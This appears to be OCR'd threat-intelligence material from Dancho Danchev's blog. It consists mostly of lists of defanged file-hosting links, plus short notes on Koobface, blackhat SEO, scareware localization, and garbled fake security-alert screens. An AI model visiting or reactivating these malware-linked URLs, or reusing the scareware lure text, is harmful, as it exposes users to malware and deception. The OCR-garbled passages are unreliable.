hxxp://www.maxishare.net/en/file/2564/ha-rar.html 
hxxp://www.savefile.info/file/3695/ha-rar.htm! 
hxxp://www.clonefile.com/download.php?id=DO88D09E1 
hxxp://4filehosting.com/file/71855/maob-rar.html 
hxxp://4filehosting.com/file/71856/maob-rar.html 
hxxp://maxishare.net/en/file/2560/maob-rar.htm| 
hxxp://maxishare.net/en/file/2561/maob-rar.html 
hxxp://www.upitus.com/download.php?file=b74f3071 
hxxp://www.upitus.com/download.php?file=c9b8ce43 


24821 


hxxp://www. youploadit.com/file/464/maob.rar.html 

hxxp://www. youploadit.com/file/463/maob.rar.html 
hxxp://uploadpalace.com/en/file/9861/maob-rar.html 
hxxp://uploadpalace.com/en/file/9860/maob-rar.html 
hxxp://www.uploadpower.com/en/download.php?id=E3FA8AF21 
hxxp://www.uploadpower.com/en/download.php?id=B4ABBA041 


hxxp://www.mercuryupload.com/media/download.php?file=90a37c4cOf69f1f44dd3db 
a93728f5d0 


hxxp://www.clonefile.com/download.php?id=60B313DA1 
hxxp://www. savefile.info/file/3693/maob-rar.html 
hxxp://www.savefile.info/file/3694/maob-rar.html 
hxxp://www. youploadit.com/file/465/maob.rar.html 
hxxp://www.maxishare.net/en/file/2563/maob-rar.html 
hxxp://supasic.com/download.php?file=422681 
hxxp://supasic.com/download.php?file=51612 
hxxp://www. youploadit.com/file/466/maob.rar.html 
hxxp://fyad.org/o6ah 

hxxp://mihd.net/xs2vdt 

hxxp://tinyload.com/3048 
hxxp://www.mytempdir.com/1369609 
hxxp://depositfiles.com/files/1173385 
hxxp://depositfiles.com/files/1173384 
hxxp://depositfiles.com/files/1173386 
hxxp://depositfiles.com/files/1173387 
hxxp://depositfiles.com/files/1173390 
hxxp://www.sendmefile.com/00553592 
hxxp://www.badongo.com/file/3687684 
hxxp://www.badongo.com/file/3687840 
hxxp://www.badongo.com/file/3298571 
hxxp://www.badongo.com/file/3688470 
hxxp://www.sendspace.com/file/t7 2kft 
hxxp://www.sendspace.com/file/qis6bf 
hxxp://www.sendspace.com/file/2ufn6s 
hxxp://www.fileflyer.com/view/PkCISCk 
hxxp://www.fileflyer.com/view/cbrwSAG 
hxxp://www.flyupload.com/?fid=9529675 
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and that includes the two new domains introduced - pam-220709 .com; ram-220709 .com, 
with ram-220709 .com/go/?pid=30909 &type=videxpgo.php?sid=4 &sref= redirecting to the 
[9]Koobface botnet. 


Interestingly, 67.215.238.178 (hosted.by.pacificrack.com) was also used in the blackhat 
SEO campaigns from June/July, with [L0]warwork .info and [11]tangoing .info parked there. 


Related posts: 

[12]Koobface - Come Out, Come Out, Wherever You Are 
[13]Dissecting Koobface Worm’s Twitter Campaign 
[14]Dissecting the Koobface Worm’s December Campaign 
[15]Dissecting the Latest Koobface Facebook Campaign 


[16]The Koobface Gang Mixing Social Engineering Vectors 


Ukrainian "fan club" and the Koobface connection: 
[17]Dissecting a Swine Flu Black SEO Campaign 
[18]Massive Blackhat SEO Campaign Serving Scareware 
[19]From Ukrainian Blackhat SEO Gang With Love 


[20]From Ukrainian Blackhat SEO Gang With Love - Part Two 
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prevent damage to your co 


[Initialization_failed C:\WINDOWS\system3 
Initiali tion_failed WINDOWS SYS] Security Alert 
Et lme you ue 
If this scree 

Detected security problems on your computer 
Spyware is software, which can gather 
information from user's computer throught 
Internet connection and send them to its 
creater. Gather information can be passwords, 
e-mail adresses and all that data, which is 
important for you. 


WARNING! Your system is infected. It is necessary to improve PC security. 


A "new tactic" is supposedly being used as a [1]Blue Screen of Death scareware template with 
a single missing fact "for the record" - the template is old, | came across it on [2]June 17th, 
with Marshal8e6 featuring it even earlier on the [3]12th of June. 


What’s new on the template front in respect to [4]scareware is what will inevitably start 
taking place across all the market segments within the underground economy in the long term 
- [5]market segmentation and localization, namely, translating the malware/spam/phishing 
templates to the native language of the prospective victims. 


2487 


hxxp://www.upitus.com/download.php?file=835ble3c 
hxxp://maxishare.net/en/file/2497/ShuhadaE4-rar.html 
hxxp://maxishare.net/en/file/2498/ShuhadaE4-rar.html 
hxxp://www.savefile.info/file/3655/ShuhadaE4-rar.html 
hxxp://4filehosting.com/file/71251/ShuhadaE4-rar.htm| 
hxxp://4filehosting.com/file/71252/ShuhadaE4-rar.html 
hxxp://4filehosting.com/file/71116/ShuhadaE4-rar.html 
hxxp://4filehosting.com/file/71323/ShuhadaE4-rar.htm| 
hxxp://www.youploadit.com/file/415/ShuhadaE4.rar.html 
hxxp://www.youploadit.com/file/416/ShuhadaE4.rar.html 
hxxp://www.youploadit.com/file/417/ShuhadaE4.rar.html 
hxxp://www.youploadit.com/file/418/ShuhadaE4.rar.html 
hxxp://www.youploadit.com/file/407/ShuhadaE4.rar.html 
hxxp://rapidshare.com/files/53354453/ShuhadaE4.rar.html 
hxxp://uploadpalace.com/en/file/9717/ShuhadaE4-rar.html 
hxxp://rapidshare.com/files/53045392/ShuhadaE4.rar.html 
hxxp://rapidshare.com/files/53045385/ShuhadaE4.rar.html 
hxxp://rapidshare.com/files/53047999/ShuhadaE4.rar.html 
hxxp://rapidshare.com/files/53048850/ShuhadaE4.rar.html 
hxxp://rapidshare.com/files/53049208/ShuhadaE4.rar.html 
hxxp://uploadpalace.com/en/file/9755/ShuhadaE4-rar.html 
hxxp://uploadpalace.com/en/file/9757/ShuhadaE4-rar.html 
hxxp://uploadpalace.com/en/file/9756/ShuhadaE4-rar.html 
hxxp://uploadpalace.com/en/file/9754/ShuhadaE4-rar.html 
hxxp://www.maxishare.net/en/file/2474/ShuhadaE4-rar.html 
hxxp://www.4filehosting.com/file/71294/ShuhadaE4-rar.html 
hxxp://www.4filehosting.com/file/71295/ShuhadaE4-rar.html 
hxxp://www.4filehosting.com/file/71296/ShuhadaE4-rar.html 
hxxp://www.4filehosting.com/file/71298/ShuhadaE4-rar.html 
hxxp://simpleupload.net/download/159392/ShuhadaE4.rar.html 
hxxp://simpleupload.net/download/159393/ShuhadaE4.rar.html 
hxxp://simpleupload.net/download/159391/ShuhadaE4.rar.html 
hxxp://tornadodrive.com/download.php/3428/ShuhadaE4.rar.html 
hxxp://www.uploadpower.com/en/download.php?id=EA7D1A811 
hxxp://www.uploadpower.com/en/download.php?id=9EC434A01 
24843 


hxxp://www.megafileupload.com/en/file/8613/ShuhadaE4-rar.html 
hxxp://netload.in/datei45505582173f2cdb0fc1223ed32b931e/ShuhadaE4.rar.htm 
hxxp://www6.oxedion.com/index.php/downloads/a6621988c4a731872cad64ea8c47716 c? 
hxxp://www5.oxedion.com/index.php/downloads/7db48b4ab91388d4ff8ee38a764fa5d 9? 
hxxp://www1.oxedion.com/index.php/downloads/370d7fd33274604113c68ea80445a0a 3? 
hxxp://www5.oxedion.com/index.php/downloads/951e706c584987115f4969c81bdec6a 2? 
hxxp://www1.oxedion.com/index.php/downloads/6b80931e89d467d8e445837125e2c48 d? 
hxxp://www.uploadcomet.com/download.php?file=e92963ae6ca478alba5dd 325df8af4le 
hxxp://www.upload.pk/freeupload/download.php?file=e92963ae6ca478alba5dd 325df8af4le 


hxxp://www.mercuryupload.com/media/download.php?file=e92963ae6ca478alba 
5dd325df8af4le 


hxxp://depositfiles.com/files/1731005 
hxxp://depositfiles.com/files/1731008 
hxxp://depositfiles.com/files/1731009 
hxxp://depositfiles.com/files/1731102 
hxxp://depositfiles.com/files/1731159 
hxxp://depositfiles.com/files/1731158 
hxxp://depositfiles.com/files/1731161 
hxxp://depositfiles.com/files/1728682 
hxxp://depositfiles.com/files/1728705 
hxxp://depositfiles.com/files/1728692 
hxxp://depositfiles.com/files/1728714 
hxxp://depositfiles.com/files/1728701 
hxxp://depositfiles.com/files/1729415 
hxxp://www.filefactory.com/file/f15a93 
hxxp://www.sendspace.com/file/yjakx| 
hxxp://www.sendspace.com/file/fxn1jq 
hxxp://www.sendspace.com/file/2r7div 
hxxp://www.sendspace.com/file/lyw2ih 
hxxp://www.sendspace.com/file/p492ij 
hxxp://www.filefactory.com/file/d42193 
hxxp://www.filefactory.com/file/b1b1cd 
hxxp://www.filefactory.com/file/e438a0 
hxxp://www.filefactory.com/file/ec2e6e 
hxxp://www.sendspace.com/file/7yjzg8 
hxxp://www.sendspace.com/file/v2v301 
24844 


hxxp://www.sendspace.com/file/47h1xa 
hxxp://www.sendspace.com/file/r7w3vh 
hxxp://www.sendspace.com/file/ux8xoh 
hxxp://www.sendspace.com/file/wt9a0w 
hxxp://www.sendspace.com/file/5s2pyg 
hxxp://www.sendspace.com/file/7g5e63 
hxxp://www.sendspace.com/file/5O0hwgk 
hxxp://www.sendspace.com/file/52w196 
hxxp://www.speedshare.org/rPS83LjJfE 
hxxp://sharebase.de/files/NNYvjNOrJt.htm! 
hxxp://sharebase.de/files/S2NqtE4hjB.html 
hxxp://sharebase.de/files/xO2Bn65Hu3.html 
hxxp://sharebase.de/files/5Pp2ZE03Lb.html 
hxxp://www.megaupload.com/?d=1LLI6G89 
hxxp://sharebase.de/files/y1s7qNOwc0.html 
hxxp://sharebase.de/files/JL99mZwUur.html 
hxxp://sharebase.de/files/hILCQcgBaW.html 
hxxp://sharebase.de/files/hbLTXSEYSb.htm| 
hxxp://sharebase.de/files/OufpXkXmSQ.html 
hxxp://sharebase.de/files/K61cXhGZY5.html 
hxxp://sharebase.de/files/708UVERpxP.html 
hxxp://sharebase.de/files/OVGpsEYDb9.html 
hxxp://www.megaupload.com/?d=TK5T3MIU 
hxxp://www.megaupload.com/?d=HK7J2TYZ 
hxxp://sharebase.de/files/SCAGYVrwkg.html 
hxxp://sharebase.de/files/W7EfrEMwO4.html 
hxxp://www.megaupload.com/?d=KTAFDJ40 
hxxp://www.megaupload.com/?d=7U40FDJ5 
hxxp://www.megaupload.com/?d=874TDOC9 
hxxp://www.megaupload.com/?d=3ACDEFJE 
hxxp://www.megaupload.com/?d=QBIQKULH 
hxxp://sharebase.de/files/UQDSASARHV.html 
hxxp://www.megaupload.com/?d=4W9Z1FNY 
hxxp://www.megaupload.com/?d=8YSBAKQD 
hxxp://www.megaupload.com/?d=RWM75RO0O 


24845 


hxxp://uploadpalace.com/en/file/10032/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10033/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10034/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10012/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10007/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10006/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10008/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10009/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10027/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10028/MSAM2-rar.html 
hxxp://uploadpalace.com/en/file/10029/MSAM2-rar.html 
hxxp://simpleupload.net/download/164723/MSAM2.rar.html 
hxxp://simpleupload.net/download/164720/MSAM2.rar.html 
hxxp://simpleupload.net/download/164715/MSAM2.rar.html 
hxxp://simpleupload.net/download/164707/MSAM2.rar.html 
hxxp://simpleupload.net/download/164685/MSAM2.rar.html 
hxxp://simpleupload.net/download/164722/MSAM2.rar.html 
hxxp://simpleupload.net/download/164719/MSAM2.rar.html 
hxxp://simpleupload.net/download/164713/MSAM2.rar.html 
hxxp://simpleupload.net/download/164706/MSAM2.rar.html 
hxxp://simpleupload.net/download/164717/MSAM2.rar.html 
hxxp://simpleupload.net/download/164712/MSAM2.rar.html 
hxxp://simpleupload.net/download/164708/MSAM2.rar.html 
hxxp://simpleupload.net/download/164695/MSAM2.rar.html 
hxxp://simpleupload.net/download/164675/MSAM2.rar.html 
hxxp://simpleupload.net/download/164716/MSAM2.rar.html 
hxxp://simpleupload.net/download/164710/MSAM2.rar.html 
hxxp://simpleupload.net/download/164698/MSAM2.rar.html 
hxxp://simpleupload.net/download/164677/MSAM2.rar.html 
hxxp://simpleupload.net/download/164721/MSAM2.rar.html 
hxxp://www.upload.pk/freeupload/download.php?file=9be8521606fdd5cced5a06 e73c3a2308 


hxxp://www.mercuryupload.com/media/download.php?file=9be8521606fdd5cced5 - 
a06e73c3a2308 


hxxp://fyad.org/pfwt 
hxxp://share-online.biz/dl/1/112 708 
hxxp://share-online.biz/dl/1/257427 
24846 


hxxp://share-online.biz/dl/1/689480 
hxxp://share-online.biz/dl/1/276316 
hxxp://share-online.biz/dl/1/608188 
hxxp://share-online.biz/dl/1/800710 
hxxp://share-online.biz/dl/1/804449 
hxxp://share-online.biz/dl/1/381949 
hxxp://share-online.biz/dl/1/672869 
hxxp://share-online.biz/dl/1/856233 
hxxp://depositfiles.com/files/1731189 
hxxp://depositfiles.com/files/1731188 
hxxp://depositfiles.com/files/1731190 
hxxp://depositfiles.com/files/1731219 
hxxp://depositfiles.com/files/1731217 
hxxp://depositfiles.com/files/1731218 
hxxp://depositfiles.com/files/1728691 
hxxp://depositfiles.com/files/1728687 
hxxp://depositfiles.com/files/1729409 
hxxp://depositfiles.com/files/1729408 
hxxp://www.sendspace.com/file/t4y9ra 
hxxp://www.sendspace.com/file/xte8!1 
hxxp://www.filefactory.com/file/9c1bf9 
hxxp://www.filefactory.com/file/4c19ec 
hxxp://www.filefactory.com/file/633624 
hxxp://www.filefactory.com/file/5a9e85 
hxxp://www.filefactory.com/file/ba0b1c 
hxxp://www.sendspace.com/file/7npxtl 
hxxp://www.sendspace.com/file/29niy6 
hxxp://www.sendspace.com/file/h8fekn 
hxxp://www.sendspace.com/file/9pjewu 
hxxp://www.sendspace.com/file/3vy29n 
hxxp://www.sendspace.com/file/q7bsvd 
hxxp://www.sendspace.com/file/9nv4ag 
hxxp://www.sendspace.com/file/z72h57 
hxxp://www.badongo.com/file/4322850 
hxxp://www.mediafire.com/?finilshwsae 
24847 


hxxp://depositfiles.com/en/files/1728837 
hxxp://sharebase.de/files/hVrt7y626Z.html 
hxxp://www.megaupload.com/?d=QJ4E00AI 
hxxp://www.megaupload.com/?d=69Y980A8 
hxxp://www.megaupload.com/?d=WE4RIO74 
hxxp://www.megaupload.com/?d=7B5PJEFN 
hxxp://www.megaupload.com/?d=KX77F2ZD 
hxxp://www.megaupload.com/?d=UTRT6309 
hxxp://sharebase.de/files/OmKhnVogfTF.html 
hxxp://sharebase.de/files/Z7ryOME4ym.html 
hxxp://sharebase.de/files/GcWIgUS9xc.html 
hxxp://www.megaupload.com/?d=LEOKF15M 
hxxp://sharebase.de/files/RVTGKp2Fkk.html 
hxxp://sharebase.de/files/YKETK6sm1L.html 
hxxp://sharebase.de/files/pb4AZDWbLL4.html 
hxxp://www.megaupload.com/?d=QF1NIXGF 
hxxp://www.megaupload.com/?d=HUINQT1A 
hxxp://www.megaupload.com/?d=X2Q5PR2U 
hxxp://sharebase.de/files/2 MDOYKNFC4.html 
hxxp://www.megaupload.com/?d=NQ9C7ZHX 
hxxp://www.megaupload.com/?d=RR3TJELM 
hxxp://www.megaupload.com/?d=VUQAGKT9 
hxxp://sharebase.de/files/MOLCC7XNN1.html 
hxxp://www.megaupload.com/?d=TZGVGDLW 
hxxp://www.megaupload.com/?d=5NMNTOYO 
hxxp://maxishare.net/en/file/2667/arvv-rar.html 
hxxp://maxishare.net/en/file/2668/arvv-rar.html 
hxxp://maxishare.net/en/file/2669/arvv-rar.html 
hxxp://www.savefile.info/file/3 72 7/arvv-rar.html 
hxxp://4filehosting.com/file/72543/arvv-rar.html 
hxxp://www.savefile.info/file/3724/arvv-rar.html 
hxxp://www.savefile.info/file/3 725/arvv-rar.html 
hxxp://www.savefile.info/file/3726/arvv-rar.html 
hxxp://4filehosting.com/file/72606/arvv-rar.html 
hxxp://4filehosting.com/file/72607/arvv-rar.html 
24848 


hxxp://4filehosting.com/file/72608/arvv-rar.html 
hxxp://www.youploadit.com/file/494/arvv.rar.html 
hxxp://www.youploadit.com/file/495/arvv.rar.html 
hxxp://www.youploadit.com/file/496/arvv.rar.html 
hxxp://www.youploadit.com/file/49 7/arvv.rar.html 
hxxp://www.youploadit.com/file/498/arvv.rar.html 
hxxp://primeupload.com/file/131326/arvv.rar.html 
hxxp://rapidshare.com/files/54849497/arvv.rar.html 
hxxp://rapidshare.com/files/54849642/arvv.rar.html 
hxxp://rapidshare.com/files/54849753/arvv.rar.html 
hxxp://rapidshare.com/files/54850057/arvv.rar.html 
hxxp://rapidshare.com/files/54850060/arvv.rar.html 
hxxp://rapidshare.com/files/54763394/arvv.rar.html 
hxxp://rapidshare.com/files/54763304/arvv.rar.html 
hxxp://rapidshare.com/files/54764555/arvv.rar.html 
hxxp://rapidshare.com/files/54766260/arvv.rar.html 
hxxp://rapidshare.com/files/54765486/arvv.rar.html 
hxxp://rapidshare.com/files/54764731/arvv.rar.html 
hxxp://rapidshare.com/files/54764224/arvv.rar.html 
hxxp://rapidshare.com/files/54763760/arvv.rar.html 
hxxp://rapidshare.com/files/54764511/arvv.rar.html 
hxxp://rapidshare.com/files/54765256/arvv.rar.html 
hxxp://rapidshare.com/files/54766861/arvv.rar.html 
hxxp://rapidshare.com/files/54763852/arvv.rar.html 
hxxp://rapidshare.com/files/54767351/arvv.rar.html 
hxxp://rapidshare.com/files/54764342/arvv.rar.html 
hxxp://rapidshare.com/files/54764866/arvv.rar.html 
hxxp://rapidshare.com/files/54765470/arvv.rar.html 
hxxp://rapidshare.com/files/54765940/arvv.rar.html 
hxxp://rapidshare.com/files/54763839/arvv.rar.html 
hxxp://rapidshare.com/files/54779872/arvv.rar.html 
hxxp://rapidshare.com/files/54779851/arvv.rar.html 
hxxp://www.zshare.net/download/3580513a0143ac/ 
hxxp://www.zshare.net/download/35805874508397/ 
hxxp://www.zshare.net/download/35806200c0eacb/ 


24849 


hxxp://www.zshare.net/download/35806597de1518/ 
hxxp://www.zshare.net/download/3580690d188459/ 
hxxp://rapidshare.com/files/54794076/arvvr.rar.html 
hxxp://rapidshare.com/files/54795094/arvvr.rar.html 
hxxp://rapidshare.com/files/54795441/arvvr.rar.html 
hxxp://rapidshare.com/files/54796187/arvvr.rar.html 
hxxp://uploadpalace.com/en/file/10011/arvv-rar.html 
hxxp://rapidshare.com/files/54796610/arvvr.rar.html 
hxxp://www.maxishare.net/en/file/2662/arvv-rar.html 
hxxp://www.zshare.net/download/3584918beb3494/ 
hxxp://uploadpalace.com/en/file/10000/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10001/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10002/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10003/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10024/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10025/arvv-rar.html 
hxxp://uploadpalace.com/en/file/10026/arvv-rar.html 
hxxp://www.4filehosting.com/file/72525/arvv-rar.html 
hxxp://www.4filehosting.com/file/72526/arvv-rar.html 
hxxp://www.4filehosting.com/file/72527/arvv-rar.html 
hxxp://www.upitus.com/download.php?file=e7df25fc 
hxxp://www.upitus.com/download.php?file=4013f234 
hxxp://www.upitus.com/download.php?file=2d5c6a0c 
hxxp://www.upitus.com/download.php?file=2bf78618 
hxxp://www.upitus.com/download.php?file=3cf809b4 


hxxp://www.upitus.com/download.php?file=a5e7d95c 


hxxp://simpleupload.net/download/164693/arvv.rar.html 


hxxp://simpleupload.net/download/164689/arvv.rar.html 


hxxp://simpleupload.net/download/164681/arvv.rar.html 


hxxp://simpleupload.net/download/164676/arvv.rar.html 


hxxp://simpleupload.net/download/164672/arvv.rar.html 


hxxp://simpleupload.net/download/164705/arvv.rar.html 


hxxp://simpleupload.net/download/164703/arvv.rar.html 


hxxp://simpleupload.net/download/164678/arvv.rar.html 


hxxp://simpleupload.net/download/164688/arvv.rar.html 


24850 


hxxp://simpleupload.net/download/164673/arvv.rar.html 
hxxp://rapidshare.com/files/54852863/aaaaaaa2.rar.html 
hxxp://www.uploadpower.com/en/download.php?id=43A890CB1 
hxxp://www.uploadpower.com/en/download.php?id=61C03DFA1 
hxxp://www.uploadpower.com/en/download.php?id=0C2BCC4E1 
hxxp://www6.oxedion.com/index.php/downloads/1deb31ff760ceb4cefcdd6bbe127e57 a? 
hxxp://www4.oxedion.com/index.php/downloads/5e480d33b1le6f09a838cf1l 10a590968F? 
hxxp://www3.oxedion.com/index.php/downloads/4b962f90f90b28e5bc28f927f79 a5683? 
hxxp://www2.oxedion.com/index.php/downloads/d87d26d924a7f3dlefd77259e0c00fb9 ? 
hxxp://www.upload.pk/freeupload/download.php?file=fe86ec29edf9801bb915f664161 9e48F 


hxxp://www.mercuryupload.com/media/download.php?file=fe86ec29edf9801bb915f664 
1619e48f 


hxxp://fyad.org/pfwu 
hxxp://share-online.biz/dl/1/331741 
hxxp://share-online.biz/dl/1/957646 
hxxp://share-online.biz/dl/1/232551 
hxxp://share-online.biz/dl/1/473825 
hxxp://share-online.biz/dl/1/100893 
hxxp://share-online.biz/dl/1/757446 
hxxp://share-online.biz/dl/1/197700 
hxxp://share-online.biz/dl/1/784077 
hxxp://share-online.biz/dl/1/494483 
hxxp://depositfiles.com/files/1731222 
hxxp://depositfiles.com/files/1731220 
hxxp://depositfiles.com/files/1731221 
hxxp://depositfiles.com/files/1731223 
hxxp://depositfiles.com/files/1728731 
hxxp://depositfiles.com/files/1728835 
hxxp://depositfiles.com/files/1728856 
hxxp://depositfiles.com/files/1729481 
hxxp://depositfiles.com/files/1729482 
hxxp://www.fileflyer.com/view/j9t|sBY 
hxxp://www.filefactory.com/file/35f5dc 
hxxp://www.filefactory.com/file/2ca28a 
hxxp://www.filefactory.com/file/9a5360 
hxxp://www.filefactory.com/file/d68089 
24851 


hxxp://www.filefactory.com/file/d1063e 
hxxp://www.sendspace.com/file/k7t965 
hxxp://www.sendspace.com/file/kyz3s5 
hxxp://www.sendspace.com/file/tgssng 
hxxp://www.sendspace.com/file/b0fwbx 
hxxp://www.sendspace.com/file/un8a01 
hxxp://www.files.to/get/42648/rhoivt7k4e 
hxxp://sharebase.de/files/ruxF21cV45.html 
hxxp://sharebase.de/files/nWpf2ttChO.html 
hxxp://sharebase.de/files/gL5Qy1XFr7.html 
hxxp://www. bigupload.com/d=BM57UE3FIB 
hxxp://sharebase.de/files/1ICNkkxW2Zu.html 
hxxp://sharebase.de/files/JoTKV1B9IM.html 
hxxp://sharebase.de/files/LaNtmGgOwa.html 
hxxp://sharebase.de/files/YKDv4DYbx4.html 
hxxp://www.megaupload.com/?d=FZYI29A0 
hxxp://www.megaupload.com/?d=YFIR39C8 
hxxp://www.megaupload.com/?d=6508jLO1 
hxxp://www.megaupload.com/?d=6X70J4BU 
hxxp://www.megaupload.com/?d=3M993P23 
hxxp://sharebase.de/files/7Omcg9VHgw.html 
hxxp://sharebase.de/files/CCbbxNQeLm.html 
hxxp://www.megaupload.com/?d=VUJJMLMSS 
hxxp://www.megaupload.com/?d=8XMJKZHB 
hxxp://www.megaupload.com/?d=NP3SQ8KO 
hxxp://www.megaupload.com/?d=NPDXM610 
hxxp://www.megaupload.com/?d=OHHDPD50 
hxxp://www.megaupload.com/?d=OKH6AAQF 
hxxp://www.megaupload.com/?d=YQCT5XDS 
hxxp://www.megaupload.com/?d=EMVDGZKQ 
hxxp://sharebase.de/files/HW4AWGpC91.html 
hxxp://www.plunder.com/-download-84595.html 
hxxp://www.savefile.info/file/3721/MSAM4-rar.html 
hxxp://www.savefile.info/file/3722/MSAM4-rar.html 
hxxp://www.savefile.info/file/3723/MSAM4-rar.html 
24852 


a) Local Disk (C:) ™ Windows Security Alert 
0 362 ww - 
pvp To help protect your computer, 


detected trojans and ready to remow 


SQ Visi! Ss solge 
mn erent 

© Srred Doaments VJ 
o akawli my 


( (+) DVD-RAM Drive 2) 
ord 
COLETTE IIIT)  Adeness Trojan 
[© eserv.Tramsponder.Trojam 
2 Wstart. TrojanDownloader 


Detected spymare and adware on your computer Flename: 


Bd 


rote t et ee eee oe a Caen 
Irternet connection and send them to &s crestor, Gathered information can 
Dasewords, o-mal addresses and all that date, which is important for you. 


Windows Internet Explorer 


SOUS EOIN feat Uy Bethy wet Netle Wa urSe ie 9950 DS Shle Sle Wad SIO IO Ory US Io viable ip 
Oe Py Vout PEDO Cal) 5 Neel s £5) PIRI SIO. 


Where Valse 7007 Gd LIOU! pe hinse MOY urCE AU BUS Ost Se Wed MEW soe Yepo 


Ce 


A decent example is the first ever template of the popular "My Computer Online Scan" fake 
scanning screen localized to Arabic - scan-online .co.cc/arabic.php (67.222.148.26). 


The last time [6]localization of fake security software was actively taking place was in 
April, 2008, and the campaigners back then also localized the domain names next to the 
actual content. 


This post has been reproduced from [7]Dancho Danchev’s blog. 


5. http://blogs.zdnet .com/security/?p=381 
6. bttp: //ddanchev. blogspot . com/2008/04/localized-fake-security-software.htm 
7. http: //ddanchev.blogspot.com/ 


5.8.6 Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware 
(2009-08-06 21:29) 
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hxxp://www.megaupload.com/?d=YO1N5GZ0 
hxxp://www.megaupload.com/?d=IBCX5H8C 
hxxp://www.megaupload.com/?d=6TG3YOPO 
hxxp://www.megaupload.com/?d=QCLD2YHB 
hxxp://www.megaupload.com/?d=2HWJ96PW 
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hxxp://www.megaupload.com/?d=RNDZHSRC 
hxxp://www.megaupload.com/?d=EFCPMQMY 
hxxp://ia341226.us.archive.org/3/items/dsalgeri2/dasos.rmvb 
hxxp://ia341208.us.archive.org/3/items/dsalgeri3/dasos.rmvb 
hxxp://ia341216.us.archive.org/3/items/dsalgeri4/dasos.rmvb 
hxxp://ia341208.us.archive.org/2/items/dsalgeri5/dasos.rmvb 
hxxp://ia341238.us.archive.org/2/items/dsalgeri6/dasos.rmvb 
hxxp://ia341212.us.archive.org/1/items/dsalgeri7/dasos.rmvb 
hxxp://ia341232.us.archive.org/2/items/dsalgeri8/dasos.rmvb 
hxxp://ia341232.us.archive.org/2/items/dsalgeri9/dasos.rmvb 
hxxp://ia341204.us.archive.org/3/items/dsalgeri10/dasos.rmvb 
hxxp://uploadpalace.com/en/file/10273/dasos-rmvb.html 
hxxp://uploadpalace.com/en/file/10272/dasos-rmvb.html 
hxxp://www.archive.org/download/dsalgeril/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri2/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri3/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri4/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri5/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri6/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri7/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri8/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri9/dasos.rmvb 
hxxp://www.archive.org/download/dsalgeri10/dasos.rmvb 
hxxp://simpleupload.net/download/169525/dasos.rmvb.html 
hxxp://simpleupload.net/download/169528/dasos.rmvb.html 
hxxp://simpleupload.net/download/169530/dasos.rmvb.html 
hxxp://simpleupload.net/download/169533/dasos.rmvb.html 
hxxp://simpleupload.net/download/169535/dasos.rmvb.html 
hxxp://simpleupload.net/download/169524/dasos.rmvb.html 
hxxp://simpleupload.net/download/169527/dasos.rmvb.html 
hxxp://simpleupload.net/download/169529/dasos.rmvb.html 
hxxp://simpleupload.net/download/169532/dasos.rmvb.html 
hxxp://simpleupload.net/download/169534/dasos.rmvb.html 


hxxp://www.upload.pk/freeupload/download.php?file=2c8a092f2b40a93da 
42c86469dadd065 


hxxp://fyad.org/pk27 
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hxxp://depositfiles.com/files/1825130 
hxxp://depositfiles.com/files/1825120 
hxxp://depositfiles.com/files/1825102 
hxxp://depositfiles.com/files/1825098 
hxxp://depositfiles.com/files/1822408 
hxxp://depositfiles.com/files/1822406 
hxxp://depositfiles.com/files/1824554 
hxxp://depositfiles.com/files/1824543 
hxxp://depositfiles.com/files/1822171 
hxxp://depositfiles.com/files/1822566 
hxxp://share-online.biz/dl/1/94BSP9117 
hxxp://share-online. biz/dl/1/2 7TUP8LO08 
hxxp://share-online.biz/dl/1/76AFK2S85 
hxxp://share-online.biz/dl/1/25DQG5P16 
hxxp://share-online.biz/dl/1/83KWO7U03 
hxxp://www.megaupload.com/?d=425HC2YS 
hxxp://www.megaupload.com/?d=YZP12GVX 
hxxp://www.megaupload.com/?d=F63R28DW 
hxxp://www.megaupload.com/?d=U7P6BA9N 
hxxp://www.megaupload.com/?d=ZF8EEQQO 
hxxp://www.megaupload.com/?d=HTG9PO0C2 
hxxp://www.megaupload.com/?d=GEBIDAUX 
hxxp://www.megaupload.com/?d=6N4EPRHN 
hxxp://www.megaupload.com/?d=ZNSNDET5 
hxxp://www.savefile.info/file/3903/dasos-rm.html 
hxxp://www.savefile.info/file/3904/dasos-rm.html 
hxxp://www.savefile.info/file/3905/dasos-rm.html 
hxxp://www.savefile.info/file/3906/dasos-rm.html 
hxxp://www.youploadit.com/file/594/dasos.rm.html 
hxxp://www.youploadit.com/file/593/dasos.rm.html 
hxxp://www.youploadit.com/file/592/dasos.rm.htm| 
hxxp://primeupload.com/file/131894/dasos.rm.html 
hxxp://rapidshare.com/files/56909025/dasos.rm.html 
hxxp://rapidshare.com/files/56963399/dasos.rm.html 
hxxp://rapidshare.com/files/56963502/dasos.rm.html 
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hxxp://picshome.com/download.php?id=93638B881 
hxxp://rapidshare.com/files/56975721/dasos.rm.html 
hxxp://rapidshare.com/files/56975930/dasos.rm.html 
hxxp://rapidshare.com/files/56976102/dasos.rm.html 
hxxp://rapidshare.com/files/56976305/dasos.rm.html 
hxxp://rapidshare.com/files/56916226/dasos.rm.html 
hxxp://rapidshare.com/files/56916237/dasos.rm.html 
hxxp://picshome.com/download.php?id=102135B51 
hxxp://rapidshare.com/files/56920423/dasos.rm.html 
hxxp://picshome.com/download.php?id=368D36E51 
hxxp://www.maxishare.net/en/file/2830/dasos-rm.html 
